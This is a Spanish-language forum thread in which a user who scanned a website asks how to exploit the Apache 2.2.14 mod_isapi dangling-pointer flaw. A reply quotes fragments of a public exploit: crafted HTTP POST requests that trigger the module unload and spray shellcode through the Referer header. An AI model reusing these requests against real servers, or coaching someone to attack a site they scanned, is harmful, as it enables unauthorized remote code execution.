Ayuda Apache 2.2.14 mod_isapi Dangling Pointer

Iniciado por Pabloxxx, 11 Octubre 2010, 08:23 AM

0 Miembros y 1 Visitante están viendo este tema.

Pabloxxx

hola.. hoy scanee una pagina web y salto esa vulnerabilidad.. es bastante nuevo el bug este.. si alguien como sabe explotarlo por favor que me ayude..

Saludos

Pabloxxx

#1
hola... nadie sabe nada? hay un video exxplicativo en una web.. pero no alcanzo a entender bien.. por favor que alguien me de una manitoo...

aca les dejo la web que lo explica http://www.senseofsecurity.com.au/advisories/SOS-10-002

Saludos

Ivanchuk

Hola pablo,

Creo que es bastante claro, te explica por todos lados como funciona. Se conecta al server y manda un http-post para hacer que cargue la dll isapi (mod_isapi).
    triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
        "User-Agent: AAAAAAAA\r\n"
        "Pragma: no-cache\r\n"
        "Proxy-Connection: Keep-Alive\r\n"
        "Host: " + serverIP + "\r\n"
        "Content-Length: 40334\r\n\r\n" +
        string(footer);


Despues paquete reset. Y ahi esta la vulnerabilidad, apache va a descargar la libreria isapi pero quedan referencias al modulo todavia disponibles.
Despues de esto para aprovecharse de esas referencias manda otro http-post pidiendo uso de la libreria descargada

    payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
        "Accept: " + string(accept) + "\r\n"
        "Referer: " + string(referer) + string(shellcode) + "\r\n"
...


En el pedido hace una onda de spray shellcode para tener mas posibilidades de que sea ejecutada. No lo probe, pero es posible que sea una loteria. La shellcode me parece que esta hardcodeada, capaz que tengas que cambiarla.

Saludos.
Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org